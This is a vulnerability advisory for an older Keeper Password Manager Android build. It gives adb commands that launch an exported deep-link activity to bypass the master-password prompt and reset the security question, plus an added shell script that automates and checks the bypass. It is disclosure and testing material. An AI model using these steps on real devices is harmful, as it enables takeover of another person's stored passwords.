SIK-2016-025


Title:

Keeper Password Manager Security Question Bypass

Report ID

SIK-2016-025

Summary:

  • Vendor: Keeper Security, Inc.
  • Product: Keeper® Password Manager (Android app)
  • Affected Version: 9.3.2-229 (platformBuildVersionName=6.0-2166767)
  • Severity: medium
  • Short summary: Starting an exported activity while the app is in a specific state lets an adversary with local access to the device reset the Keeper security question without any further authentication. If the mail account linked to the Keeper account is also set up on the phone and reachable by the adversary, he can then reset the master password and gain access to all stored passwords.

Details:

Once the user is logged out, the master password must be entered before the passwords stored in the app can be accessed. An adversary with local access to the device can instead attempt to reset the master password. The attack scenario assumes that local access to the device also gives the adversary access to the mail account linked to the Keeper account (for example an unlocked mail app on the same phone).

After entering the master password incorrectly once, the adversary can select “Forgot Password”, after which the app asks for a verification code.
While the app is in this state, the adversary launches the exported deep-link activity with the Activity Manager shell tool am. For the Keeper build with minSdkVersion=15 the activity is com.callpod.android_apps.keeper.DeepLinkActivity:

adb shell am start -n com.callpod.android_apps.keeper/.DeepLinkActivity

For the Keeper build with minSdkVersion=19 the activity is ParseDeepLinkActivity, started with a VIEW intent for a Keeper link:

adb shell am start -n com.callpod.android_apps.keeper/.ParseDeepLinkActivity -a android.intent.action.VIEW -d "https://kepr.co"

Instead of showing the login activity, the app then displays an empty password list with a different background. In this state the navigation menu on the left is still reachable, and from it the “Settings” menu. There the adversary can reset the security question without knowing the master password or the answer to the previous security question.

The app must then be force-stopped in the application manager. After restarting it, the adversary re-enters the “Forgot Password” view, reads the verification code from the user’s mail app and enters it in the Keeper app. The app then prompts for the security question, which the adversary can answer because he defined both question and answer in the previous step. He can now set a new master password and view all stored passwords.
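The following POSIX shell script is an added example, not code from the advisory or from Keeper. It drives the two launch commands quoted above and reports which activity ends up in the foreground, so a tester can tell whether the master-password prompt was bypassed. It cannot automate the precondition (the app must already be logged out and sitting in the “Forgot Password” verification-code view). Everything not taken from the advisory is an assumption: adb and aapt on PATH, the dumpsys line shape `mResumedActivity: ActivityRecord{... u0 pkg/.Activity t42}` as printed by Android 6.0-era devices, and the login screen name, for which `.LoginActivity` is only a placeholder to be overridden with the real class name via `EXPECTED_LOGIN`.

```shell
#!/bin/sh
# Added example for SIK-2016-025; not code from the advisory or from Keeper.
# Runs the two launch commands the advisory gives and reports which activity
# ends up in the foreground, so a tester can tell whether the master-password
# prompt was bypassed. Precondition the script cannot automate: the app must
# be logged out and sitting in the "Forgot Password" verification-code view.
# Assumptions: adb and aapt are on PATH, the device is authorised, and the
# login screen name in EXPECTED_LOGIN (".LoginActivity" is a placeholder,
# not the real class) is supplied by the tester.

PKG="com.callpod.android_apps.keeper"

# Extract minSdkVersion from `aapt dump badging` text, which prints a line
# such as sdkVersion:'19'.
min_sdk_from_badging() {
    printf '%s\n' "$1" | sed -n "s/^sdkVersion:'\([0-9]*\)'.*/\1/p" | head -n 1
}

# Return the am invocation the advisory gives for each build generation:
# a bare start for minSdkVersion=15, a VIEW intent on a Keeper URL for 19.
launch_cmd_for_sdk() {
    if [ "${1:-0}" -ge 19 ]; then
        printf '%s\n' "am start -n $PKG/.ParseDeepLinkActivity -a android.intent.action.VIEW -d https://kepr.co"
    else
        printf '%s\n' "am start -n $PKG/.DeepLinkActivity"
    fi
}

# Parse the foreground component out of `dumpsys activity activities`
# (assumed line shape: "mResumedActivity: ActivityRecord{hash u0 pkg/.Act t42}").
resumed_component() {
    printf '%s\n' "$1" \
        | sed -n 's/.*mResumedActivity:.* u[0-9][0-9]* \([^ ]*\/[^ }]*\).*/\1/p' \
        | head -n 1
}

# Verdict: "login-prompt" if the expected login screen is in front,
# "bypass" if any other Keeper activity is (the bug), "other" otherwise.
classify_foreground() {
    comp="$1"
    expected_login="$2"
    case "$comp" in
        "$expected_login") echo "login-prompt" ;;
        "$PKG"/*)          echo "bypass" ;;
        *)                 echo "other" ;;
    esac
}

main() {
    apk="${1:?usage: $0 keeper.apk}"
    login="${EXPECTED_LOGIN:-$PKG/.LoginActivity}"   # placeholder name, override via env
    sdk=$(min_sdk_from_badging "$(aapt dump badging "$apk")")
    cmd=$(launch_cmd_for_sdk "$sdk")
    echo "minSdkVersion=$sdk -> adb shell $cmd"
    adb shell "$cmd" >/dev/null
    sleep 2   # give the activity time to come to the foreground
    comp=$(resumed_component "$(adb shell dumpsys activity activities)")
    echo "foreground: $comp -> $(classify_foreground "$comp" "$login")"
}

# Only run the live check when an APK path is given; the functions above can
# be exercised against captured aapt/dumpsys output without a device.
if [ "$#" -gt 0 ]; then
    main "$@"
fi
```

Run it as `EXPECTED_LOGIN=com.callpod.android_apps.keeper/.RealLoginClass sh keeper_deeplink_check.sh keeper.apk` with the app already in the verification-code view. A “bypass” verdict means a Keeper screen other than the login prompt is in front after the intent, which is the state the advisory describes; the same run against a fixed build should report “login-prompt”.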

Workaround

Protect the local mail app, e.g. with a password or a separate PIN, so that the mail containing the verification code cannot be read by an adversary with device access. This only blocks the second half of the attack; the security question can still be reset through the exported activity.

Suggested Mitigation

One possible fix: starting com.callpod.android_apps.keeper.DeepLinkActivity (or ParseDeepLinkActivity on the minSdkVersion=19 build) while the user is logged out should always prompt for the master password before any other screen, including “Settings”, becomes reachable.

Timeline

  • 2016-05-25 Vulnerability Discovered
  • 2016-05-25 Vulnerability Reported
  • 2016-10-06 Vulnerability Fixed